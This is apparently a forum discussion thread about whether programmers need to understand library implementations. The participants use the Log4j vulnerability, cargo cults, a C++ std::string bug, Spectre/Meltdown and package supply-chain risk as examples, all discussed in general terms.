Here’s an example: this is the interface for Log4j:
https://logging.apache.org/log4j/2.x/log4j-api/apidocs/org/apache/logging/log4j/Logger.html
It’s dead simple to use. I’ve used it a zillion times. Instantiate a logger in your class, and start writing log entries. There is no reason at all to know how it is written. In fact, the same interface could be used for a whole lot of different implementations, even in different languages. Formexample, someone could improve performance by rewriting some internal Java code in assembler, and consumers would not and should not have to know. If implemtation mattered to consumers, then every time log4j was updated thousands of applications would have to be modified.
It’s somewhat amazing that you chose that example. As I’m sure you know, log4j contains a massive security hole allowing remote code execution by anyone that can put plaintext in the log (basically anyone).
It’s a massive problem specifically because it was used by thousands (probably hundreds of thousands) of parties that did no investigation of how it operated. If they had, they would have preemptively disabled the buggy feature or added some extra sanitization. But no, they treated it as a secure black box, since it was basically advertised that way, and now it’s the single biggest security problem on the net.
No it isn’t, and no it shouldn’t.
If you want to learn the implementaation details of every class you use, go for it. But it’s not necessary, and must not be necessary. If programmers had to learn the implementation of every class they used, nothing would get done. And if you spent my time and momey sitting round learning the implementation of every library you used, you’d get a bad review and a lesson in priorities. We built applications that used hundreds of libraries, probably containing millions of lines of code. Good luck with learning all that. You should be spending your development time making sure your own code is written correctly and tested properly.
Occasionally we will dig into the code of a library. Typically when we suspect the library is buggy, or if it needs to be modified for our use, But in this case we always go to the library authors and try to get them to add it to the library, because dealing with forked libraries is a pain and not good practice if it can be avoided.
So you think the problem the south sea islanders had was that they just didn’t have the electronics skills to build proper headsets and microphones? That’s just not the case. Dave Clark himself could have dropped a shipping container of headsets and microphones and it would have made no difference because the airplanes didn’t arrive because people on the island had headsets. They arrived because the countries thst flew them were fighting a war, and when the war ended, so did the flights. THAT was what the islanders did not understand. The headsets weren’t causal - they were just one of many requirements for planes to land, but they weren’t the reason the planes came.
The cargo culters also built ‘runways’, and built bamboo airplanes to park alongside it because they were recreating the conditions they saw when last the planes came.
I can give you a perfect example of modern cargo-cult thinking: A city planner notices that other cities that have thriving businesses also have business centers. So they decide that if they also build a business center, businesses will come. In fact, the existence of a business center is a result of having lots of businesses, not the cause of it. Cargo-Cult thinking is all around us, but it has nothing to do with modular programming.
What I said is that having no knowledge of the underlying details is a significant limitation, not that one must learn every detail of every class they use. At the least, one must have the ability to dig down into the details.
As a real example, I recently debugged a std::string problem that cropped up after switching to a new compiler version. Now, I had never debugged std::string before; it’s obviously rock-solid since it’s the core C++ string class. Nevertheless there was a problem.
Eventually I traced it to some code on our side that had memset the memory to zeroes as an init step. The previous std::string implementation accepted this and treated it as a null string. After, that was no longer legal and it crashed.
This was a bug in our code, but nevertheless the abstraction leaked. And I was able to debug it quickly and definitively because I was comfortable in stepping through the C++ standard libraries and had some idea of how they worked going in.
If the islanders really understood things at all levels–from the functioning radios to the way they navigate to the entire logistical system–they could have gotten some planes to land. They would have found, basically, a security vulnerability in the system, by faking RDF signals or even just social engineering. Or, if they hadn’t, they’d know why their fakes didn’t work.
Hackers, black-hat or otherwise, don’t limit themselves to one layer of the system. They don’t assume the abstraction is perfect. They find holes in the layers, ones that can shoot right down to a lower layer that might be making assumptions that are valid at its level but not a higher one.
By the way, with distributed computing, including cloud computing you can’t know the implementation. And modern development environments pull down the latest version of all your packages unless you specifically fix the version (which is not hood practice) meaning the implementation could change on you at any time.
When log4j is fixed it could be a simple change or a complete rewrite, and none of the consumers of the class need to care. By design. When people build software that uses the class, it will be replaced with the new one.
Of course you can. Why do you think Spectre and Meltdown were such big issues? Because they made it so that another process on the system, even one running a different guest OS on the same physical system (i.e. totally out of your control), could steal information.
You’re supposed to assume that the cloud is magic and just works seamlessly all the time, but it doesn’t.
Frankly, I think we’re really due for a reckoning in package management, and it won’t be further in the direction of the current free-for-all. There is a huge complex of supply chain vulnerabilities across all package repositories.
And in the meantime, all your trade secrets and business confidential data are belong to us.
Yeah, that’s a different issue. We are doing too much centralizing, which is destroying the fault tolerant nature of the internet. It makes sense economically or we wouldn’t do it, but the systemic risk of creating many single points of failure or common attack surfaces is not priced. It’s an externality.